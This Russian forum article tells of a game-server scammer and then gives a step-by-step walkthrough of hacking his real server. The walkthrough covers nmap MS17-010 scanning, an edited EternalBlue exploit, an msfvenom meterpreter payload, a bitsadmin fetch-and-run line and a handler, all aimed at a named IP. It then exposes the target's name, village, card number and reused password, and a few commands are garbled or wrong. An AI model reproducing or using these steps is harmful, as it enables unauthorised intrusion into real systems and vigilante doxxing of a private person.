По горячим следам: или как парень с отрицательным IQ 6 лет безнаказанно кидал людей на деньги - при чем здесь нейросеть и онлайн игры
Отдаленный звук сирены. Какой-то шепот назойливо бубнит в ушах. Твои мысли сконцентрированы лишь на одном. Паранойя? Нет, реальность. Ведь он повсюду. Нельзя даже нормально почитать новости, где кто, где их оппозиция, а где желтая пресса. Это все то, что люди любят и что так дорого их сердцу. Совсем скоро искусственный интеллект это все напрочь вытеснит, но перед этим позволь мне задать тебе один вопрос: какие ассоциации у тебя, когда ты слышишь об ИИ?
Возможно, это будут роботы из Бостон Дайнемикс, а может и робот-пылесос, который ездит по квартире и называет всех кожаными ублюдками, попутно затирая что-то об ущемлении прав чернокожих, а возможно нейросеть, которая напишет песню с лирикой не хуже, чем у Моргенштерна, это, естественно, ирония. Помнишь, вчера ты проходил вот эту надоедливую капчу, выбирая кадры со светофорами, велосипедами или людьми? Так вот, сам того не замечая, ты внес свой вклад в развитие нейросетей.
А вот обычный телефон, вчера ты случайно поставил лайк на фото с Райаном Гослингом, а сегодня с утра твоя лента пестрит предложениями посмотреть Бегущего по лезвию, Драйв или Дневник памяти. А замечал ли ты, что тебе часто приходят уведомления о происшествиях из жизни тех людей, которые тебе интересны? (Реклама знакомств с милфами не в счет, её предлагают абсолютно всем и каждому).
Но обо всем этом немного позже, сегодня у нас намечается или создание ещё одного нового цикла или… продолжение старого. Помните вы или нет, а годик назад у нас был цикл, именуемый как “По горячим следам”. В рамках его мы рассматривали различные мошеннические схемы и наказывали злодеев, в целом ничего особого, и этот цикл я считаю мертвым, хотя почему бы не попытать удачу, однако этот и последующие выпуски будут слегка отличаться, главное помните, что в основе - это развлекательная писанина, прошлые выпуски вот здесь:
1. По горячим следам: в попытках раскрыть мошенническую схему - Discord, ботнет да стиллеры
2. По горячим следам: расследуем мошеннические схемы - Undetected Handler и барыга-идиот
3. По горячим следам: эпизод три - не неуловимый стиллерщик и его просчеты
4. По горячим следам: эпизод четвертый - Скамер-Феликс и его тридцать три несчастья
5. По горячим следам: эпизод пять - Reverse Shell в документе, обман через Jivo и немного HTA-малварей
6. По горячим следам: эпизод шесть или как я с костлявой поиграл - дырявый WinRar, BlueKeep, Fake Voice Multi-Tacotron и немного чертовщины: ÿ. & duevile
7. По горячим следам: эпизод семь - конкурс на купон, жулик-Никитос, уязвимости LUA и немного QR-кодов во имя справедливости
Дисклеймер
На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект - это знания.
И напоминаю, что в рамках этой связки статей у нас действует конкурс на 5.555 рублей, а связан он с отсылками в моих работах: культовые фильмы, анимешки, да и просто мемы с играми. Узнали? Пишите комментарий, ведь тот, кто раздает все пасхалки - получит денежку.
Часть первая: тот самый Степан и его уникальная схема развода
Итак, данный выпуск не будет содержать каких-то серьезных способов обмана или продвинутых схем по выкачке денег. Здесь будет некая подборка сверхразумов, естественно утрирую, которые каким-то образом достигли мысли об использовании ИИ в своих схемах.
Так как гении зачастую становятся отвергнутыми обществом, обычно они имеют целый ряд “замечательных” и отличительных черт своего характера: замкнутые, малообщительные и обиженные на всех и вся. Первая часть этой статьи будет состоять из рассказа об одном из таких индивидов, в силу прогрессирующих умственных дефектов и репрессий лишней хромосомы данный субъект подвержен маниакальному мнению о превосходстве собственной личности над другими, Субъект А, а именно так будем его называть, не брезгует любыми методами по пути достижения своей цели, а она у него прозаично проста, в отличие от самомнения - найти дурачка, чтобы выкачать из него побольше зеленых. Поехали.
В какой-то из своих статей я уже упомянул, что являюсь заядлым игроком в старенькую игрушку Counter Strike 1.6. Так как в этой игре действительно сочетается то самое немногое, отсутствующее в большинства современных играх, а именно наличие достаточно дружного и общительного комьюнити нытиков, с которым можно как просто поговорить, так и здорово поссориться, в добавок плюсом является взрослая аудитория. Эта игрушка является для меня своего рода отдушиной, в которой я просто могу избавиться от лишних мыслей и отдохнуть, общаясь с различными интересными, ну и не очень, личностями.
И здесь я хотел бы обратить особое внимание, что играю я достаточно неплохо, до киберспорта, конечно, достаточно далеко, но, в принципе, этого с лихвой хватает, дабы выводить людей на эмоции, а сие дело меня особенно веселит.
И вот на данном этапе, наверное, у вас закрадывается мысль - а какое отношение все это имеет к теме статьи? А вот читайте дальше и все прояснится.
Собственно говоря, на одном из серверов, где играют исключительно взрослые и состоятельные нытики, у которых явно все отлично в этой жизни. На глаза мне попадается как раз-таки этот Субьект А. Изначально я просто думал, что у него нелады с головой, так как будучи администратором проекта он не брезговал высказываниями в стиле “Выйди отсюда ублюдок” или “Смаааатрии он по квадратам наводитсо через стену”. Где-то здесь я оставлю запись его разговоров, чисто посмеяться.
Изначально меня это забавляло, но после часового спектакля в одну роль, так как я просто не отвечаю на подобное, сие ситуация достала не только меня, но и других людей. В развязке этого я просто получаю бан якобы за воллхак, которого, естественно, у меня не было.
И вот с этого момента начинает происходить мистика, как оказывается сервер построен таким образом, что в принципе любые баны он не регистрирует и кроме сообщения ничего не происходит. Намеренно ли это сделано или просто ошибка - я до сих пор сомневаюсь, но то, что начнет происходить дальше это отдельный вид искусства.
Я снова захожу поиграть, ну как бы меня больше тогда ничего и не интересовало в принципе, так как я болел и настроения выяснять что-либо у меня не было. Здесь стоит отметить наперед, что этот персонаж сперва расспрашивал как меня зовут, откуда я и так далее. В ответ же сам ничего не говорил, потому я детально изучил профиль в Стим этого бравого борца с читерами, которых и вовсе там не было. Это напоминает мне вот этого парня, который предпочитает борьбу с, цитирую: “невидимыми несуществующими драконами”, реальности.
“А он ещё и бан обходит, пойду писать создателю”- , с этими словами Субьект А, покидает поле наших действий, по крайней мере тогда я так считал.
Спустя минут 20 на сервер заходит некий игрок под ником “Wizard”, я сразу же смекаю, что это тот самый создатель и видимо дальше играть здесь у меня не получится, но решаю просто закрыть на это глаза.
Спустя пару мгновений ко мне приятным голосом девушки обращается этот самый создатель, меня это немного удивляет, но заводится типичный разговор, типа “кинь демку и пройди проверку античитом”, что для меня особых затруднений не составило. Но меня больше смутило наличие какого-то механического оттенка в голосе. Если вы помните, когда-то в одном из циклов мы рассматривали возможность подделки голоса с помощью искусственного интеллекта, и у меня сразу же возникло вот это ощущение, что сейчас будет что-то интересное.
Здесь немного отвлекусь, существует универсальный античит для КС 1.6, который именуется как Варгодс: он осуществляет полную проверку устройства и самой игры на наличие использования посторонних программ для получения преимущества. Обычно администраторы просто говорят, мол “Загугли, скачай и просто кинь ссылку на результаты в чат”. Здесь все идет абсолютно иным образом - Она , он или оно кидает ссылку на скачивание (
Ссылка скрыта от гостей
/wargods), открыв которую мы видим следующую картину:
Сразу же можно понять, что это попросту файлообменник, открывающийся самым примитивным образом. Ну, естественно, я решил скачать данный файлик и после проанализировать, ведь я считаю, что в нем далеко не все так просто, но сейчас открывать его не стану, отморозившись, мол у меня провайдер блочит ссылку на скачивание, потому я взял программу с официального сайта и кидаю результат.
Якобы девушка-владелец, хотя на то время я уже знал, что это действительно владелец, а значит, что у этого персонажа есть доступ к моему реальному айпи адресу. Хотя в принципе мне этого страшиться незачем, ведь максимум, что у них выйдет мне сделать это… Ничего. Кстати, если хотите могу сделать детальный гайд где-то по аудиту безопасности собственной системы, если кого-то такое интересует.
Хотел я сказать не это совсем, Wizard заметно поник после того, как я не открыл именно его программку, но сказал, что все в порядке и читов у меня нет, но “она” затем предложила купить иммунитет, чтобы подобная ситуация не повторялась. На деле, на серверах , где я активно играю, всегда покупаю какую-то привилегию, дабы не выделяться особо. Потому я согласился, перешел на их форум, кстати, выглядит он вот так:
И перешел в раздел покупки, затем пополнение баланса через сервис Интеркасса.ком, на тот момент я не обратил особого внимания на различия ссылки в адресной строке с оригиналом, так как не особо часто-то и пользуюсь таким сервисом. Сразу же после нажатия на кнопку PAY, идет перенаправление на исходную страницу реальной Интеркассы.
То есть, не тяжело понять, что только что я отдал все данные своей карты злоумышленнику. Если начисто, то их запросто теперь можно продать на каком-то сомнительном сайте в дарквеб и получить гроши в виде 1-2$, так как заметьте, что без подтверждения через СМС или приложение на данный момент списать с карты средства невозможно. Если, конечно, речь идет о современных банках, а не дрянных, застрявших в прошлом столетье.
Здесь хочу заметить, что аудитория проекта, состоящего из нескольких серверов, составляет около 300 человек, примерно половина купит здесь какую-никакую привилегию или снятие бана. Думаю, что все складывается в достаточно неплохой теневой бизнес.
Благо, что у меня динамический CCV да и номер карты я могу менять по собственному желанию сколько угодно.
Но и это ещё не конец, за очередной дозой материала мне захотелось ещё побыть на этом сервере, думалось мне, что будет ещё о чем рассказать и я не ошибся, черт возьми. Я был прав. Помните Субъекта А? Также у меня уже существовало некое понимание ситуации и Субъект А на 90 процентов был той самой девушкой-создателем, которая или который… Черт, как к нему обращаться… Проще говоря Оно уже попыталось дважды скомпрометировать мои персональные данные.
Так вот, сразу же после того как я появляюсь в игре, объявляется ещё одна псевдо барышня. Напомню, что общаясь с Субъектом А, я подчистую выдал данные типа своего имени, города проживания и так далее.
На сей раз никнейм “Рыбка”, но вот незадача профиль Стим тот же, что и был у Субъекта А. Но я решил подыграть, да будет так. Естественно, эта рыбешка завела разговор ещё с кем-то, возможно, тоже подставным фигурантом игры, где как-бы невзначай упомянула, мол она из города автора, то есть моего. После уже подключился я, где сделал вид наивного дурачка и позволил себя развести. В итоге все дошло до предложения сходить вместе на фильм, которое я, естественно, принял.
Оу-у, к слову. Механический тон голоса и тембр остался тем же, что и у создателя.
И я вот все думал в чем здесь подвох, а был он в поддельном сайте кинотеатра моего города, где оплата ссылалась на ту же самую поддельную страницу интеркассы, но в этот раз уже чутка иначе, ведь форма оплаты здесь действительно работала. Помните, мне один парень писал, что его так развели на сайте знакомств? Ну вот же оно. Аналогично.
Часть вторая: ищем Степашку-дурашку и отбираем его бизнес
Ну и после я просто словил бан по железу и айпи, хотя для меня это особых проблем-то и не составляло. Первым делом хочется мне проанализировать тот самый файлик, якобы античит, который меня заставляли качать.
Но сперва давайте рассмотрим те самые фотографии, которые использовал наш гений Субъект А. На деле мне изначально вовсе показалось, что это просто какая-то картинка из интернета, но если рассмотреть профиль в телеграмме, который пестрит фотками, то можно заметить некоторую оплошность, где-негде виднеются смазывания, плюс сама кожа лица имеет явно неестественный окрас. Воспользовавшись тем же FaceApp можно сделать что-то подобное, но не настолько качественно.
Потому на Гитхабе я нашел готовый репозиторий с обученной нейросетью, который способен выдать подобный результат. В принципе, выгляжу теперь я вот так:
Установить можно вот так, само использование предельно просто:
Код:
git clone https://github.com/twtygqyy/pytorch-SRResNet.gitДля генерации голоса в целом может подойти что-то типа этого:
Код:
git clone https://github.com/twtygqyy/pytorch-SRResNet.gitНо с наложенной маской и тембром женского голоса, хотя остается некая задержка и неестественность, да и работает только с английским, скорее всего Субъект использовал что-то иное, но на всякий оставлю ссылочку на видео на Ютуб:
Что же.. Для начала давайте просмотрим сам файл и его свойства, может быть чего интересного и заметим. Но, к сожалению, нет. Я не стал особо думать и просто залил этот файл на виртуальную машину, прежде просканировав его антивирусом, который показал, что это VNC Пэйлоад. Дабы убедиться в том, что он рабочий открыл простенький сниффер трафика и сам вредонос. Далее замечаем два новых подключения, которые идут в сторону айпи адреса игрового сервера, а сам процесс просто висит в диспетчере задач.
Здесь я сделал для себя два вывода: используется не хостинг серверов, а отдельный арендованный VDS с доступом через RDP и то, что Субъект А явно слегка или нет, но страдает каким-то умственным дефектом . Хотя если так посмотреть, то в большинстве случаев в КС 1.6 играют люди за 30, которым абсолютно плевать на вирусы и так далее, главное чего они хотят - расслабиться, потягивая пивко или что покрепче.
Учитывая, что целевая аудитория легкоубеждаемая, плюс зачастую под действием алкоголя, никак не связана со сферой IT или Информационной безопасности, то это идеальный плацдарм для таких вот манипуляций. Только вот проводить подобные деяния желательно в случае, когда твой собственный IQ выше 10, вот незадача, иначе будет больно.
Итак, просматривая форум проекта мне удалось добыть следующую информацию: сервер существует с ноября 2016 года, его айпи никогда не менялся, на нескольких порталах имеются жалобы от пользователей о скаме.
Мг-г, мое предположение, что этот сервер выглядит следующим образом изнутри - обычная CMD строка от имени администратора, а сама машина - это выделенный сервер, который предназначен для гражданского пользования.
Потому давайте просканируем айпи адрес в nmap:
Код:
nmap 91.211.118.87Открытые порты: 3389, 80, 135, 445 27015 , операционная система Windows 7 .
С помощью сервиса 2IP проверим самого провайдера, чтобы убедиться, что это таки не хостинг-компания, результат вот:
Исходя из этого можно уверенно сказать, что это обычный, как говорили в году 2014, дедик.
А тут немного отвлечемся, так как злоумышленник А использовал поддельный сайт Интеркассы в первом случае, но с переадресацией на реальный сайт и оплату по счету пополнения. Интеркасса работает в качестве посредника перевода денег на карту, списывая комиссию за пользования сервисом, но за то якобы ваш номер карты остается незамеченным, вот только поискав что-то напоминающее счет я нашел вот это - 4441747424592742.
Затем, используя приложение этого банка, делаем перевод в несколько рублей, получая имя и фамилию получателя. Степан Жарков. А только потом я заметил, что номер карты был ещё и указан на странице пополнения.
Запомним это имя собственно, а теперь идем дальше к серверу, который имеет кстати открытый порт 445. Что наталкивает на мысль о том, чтобы использовать ЭтерналБлю, но сперва запустим чекер. Не будем мучать метасплоит, а используем nmap, выглядеть будет следующим образом:
Код:
nmap -p 445 -Pn --script smb-vuln-ms17-010 91.211.118.87Хост выглядит уязвимым. Давайте проведем мануальную эксплуатацию, никогда так не делал, потому будет самому интересно.
Первое, что нам нужно сделать, это найти файл эксплойта. В Kali мы можем использовать searchsploit в терминале для поиска совпадений в базе данных:
Код:
searchsploit eternalblueНужный нам эксплойт помечен как 42315.py , дабы все было в порядке и не возникло никаких неполадок, , давайте создадим каталог для работы, а после и копируем нужный скрипт в него :
Код:
mkdir exploit
cp /usr/share/exploitdb/exploits/windows/remote/42315.py /root/exploit/На вякий такой случай, перейдем в каталог и проверим наличие скрипта там:
Код:
cd exploit
lsСейчас мы можем взглянуть на исходный код для получения дополнительной информации об этом конкретном эксплойте. Это довольно длинный файл, поэтому мы можем использовать команду less , чтобы просмотреть его сверху:
Код:
less 42315.pyДля этого эксплойта требуется действительный именованный канал (мы скоро доберемся до этого) и действительный набор учетных данных . Это могут быть любые другие учетные данные от пользователя, который входил в систему в прошлом, включая гостевые учетные записи. Эксплойт автоматически обновит нас до привилегированной учетной записи при запуске.
Теперь проверим есть ли на целевом сервере рабочая гостевая учетная запись, это очень важно, ибо в противном случае ничего не получится. Подключимся как Guest посредством стандартного RDP, не забыв врубить VPN.
Операция успешна.
Сейчас мы уже можем отредактировать файл Python и ввести действительные имя пользователя и пароль для использования, выглядеть в нашем случае это будет следующим образом:
Код:
Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
'''
USERNAME = 'user'
PASSWORD = 'password'
'''
A transaction with empty setup:
- it is allocated from paged pool (same as other transaction types) on Windows 7 and later
- it is allocated from private heap (RtlAllocateHeap()) with no on use it on Windows Vista and earlier
- no lookaside or caching method for allocating itА теперь и запустим сам скрипт:
Код:
python exploit.pyВ ответе видим следующее:
Код:
exploit.py <ip> [pipe_name]Переходим ко второму шагу, здесь мы будем искать так называемый именуемый канал. Сейчас минутка объяснений:
Именованные каналы — это способ взаимодействия запущенных процессов друг с другом с минимальными издержками. Каналы обычно отображаются в виде файлов, к которым могут подключаться другие процессы.
Ссылка скрыта от гостей
есть сканер, который найдет любые именованные каналы на хосте. Потому в окне Метасплоита вводим следующее:
Код:
search pipeНам нужен pipe_auditor, потому используем его и сразу же просмотрим опции:
Код:
use 7
show optionsВсе, что нам действительно нужно сделать - это указать IP-адрес нашей цели:
Код:
set rhosts 91.211.118.87
runТак-с, далее нам нужно вернуться в первый терминал и запустить питон скрипт:
Код:
python exploit.py 91.211.118.87 netlogonОтвет должен получиться примерно таковым:
И как видим из этого, на целевой машине был создан текстовый файл с именем pwned.txt, это очень хороший знак, стало быть мы можем создать там что-то и более зловещее. Поехали.
Нам понадобится полезная нагрузка и способ, с помощью которого эксплойт сможет ее получить и выполнить. Для этого мы можем использовать MSFvenom, чтобы генерировать некоторый шелл-код, а затем и выполнить его обслуживание с нашей машин посредством Apache . В новом терминале используем следующую команду, чтобы сгенерировать полезную нагрузку и сохранить ее в файл с именем sc.exe в корневом каталоге веб-сайта по умолчанию для сервера Apache:
Код:
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost= 91.211.118.87 lport=4321 -e x64/xor -i 5 -f exe -o /var/www/html/sc.exeТеперь мы можем запустить сервер Apache, чтобы эксплойт мог подключиться к нашей машине с цели, чтобы получить полезную нагрузку:
Код:
service apache2 startРедактирование кода будет немного муторным, но расписывать подробно не буду, все таки не учу никого здесь делать этого, а просто показываю методы. Сперва ищем вот этот фрагмент кода:
Здесь мы видим код, отвечающий за подключение к цели и создание текстового файла. Мы также можем увидеть интересную функцию под названием service_exec() , которая закомментирована. Эта функция отвечает за подключение к цели и выдаст команду для копирования ранее созданного текстового файла в новый текстовый файл с именем pwned_exec.txt на диске C. Мы можем использовать эту функцию, чтобы получить нашу полезную нагрузку и выполнить ее на цели.
Сначала изменим функцию, заметив все после cmd /c следующей командой:
Код:
bitsadmin /transfer pwn /download http://91.211.118.87/sc.exe C:\sc.exeBITSAdmin (фоновая интеллектуальная служба передачи) — это инструмент командной строки Windows, используемый для загрузки или скачивания файлов. Переключатель /transfer инициализирует передачу ( в данном случае с именем pwn ), а /download указывает, что это загрузка. Затем мы вводим имя удаленного файла (размещенного на нашем компьютере) и имя локального файла после его передачи.
Затем добавим еще одну функцию service_exec() и заставим ее выполнять только что переданный файл. Код будет выглядеть так:
Код:
service_exec(conn, r'cmd /c /sc.exe')Собственно на этом все, запустим слушатель в метасплоит:
Код:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 91.211.118.87
runОн будет прослушивать любые входящие подключения, и если все пойдет гладко, мы получим сеанс Meterpreter после завершения нашего эксплойта. И наконец, у нас должно быть все на месте и готово к работе. Мы можем запустить эксплойт так же, как мы делали ранее в нашем тестовом прогоне, из каталога:
Код:
python exploit.py 91.211.118.87 netlogonНесколько ошибок, но пусть. Глядим на слушатель, и вуаля - у нас полноценный сеанс от лица системы. Проверим это с помощью команды:
Код:
sysinfo
На этом этапе я очень долго думал, что же мне лучше сделать - просто удалить сервер или же устроить тотальный деанон нашего вора А? Не долго думая, я решил посмотреть сеансы RDP подключений, прежде сменив пароль от админского аккаунта и подключившись обычным образом.
Просто зайдем в Event Viewer и посмотрим последние подключения. Стабильно каждый день подключался один и тот же айпи. Село Корюковка. Хе-хе. Имея все эти доказательства его спокойно можно засадить на нары, но этого делать я не стану. Все таки охота превратить его в свою пешку и понаблюдать за тем, что же он предпримет.
Так как все логи и данные сервера находятся теперь у меня, мне не составило труда найти папку Setinfo, которая содержит пароли от админских аккаунтов сервера в КС. Его кстати парольчик-то - stepa1989 .
Он подошел и к форумному аккаунту, а там я уже узнал и почту… Ну, а дальше думайте сами к чему приводит желание ставить одинаковые пароли везде. Хе-хе.
Итоги
Начали за здравие, а закончили за упокой. Такой вот выпуск, но его я решил поделить на две части, охотно позабавлюсь с этим Степаном, а теперь… Стоп, это получается у меня появился свой сервер в КС. Хм-м. Пойду играть что-ли. А с вами как обычно был какой-то парень под ником DeathDay (а также бесплатная версия редактора Яш.екзе), и его нелюбовь к обману. Свидимся.
Волшебник Степан. 1989 - 27.08.22.
Последнее редактирование модератором:
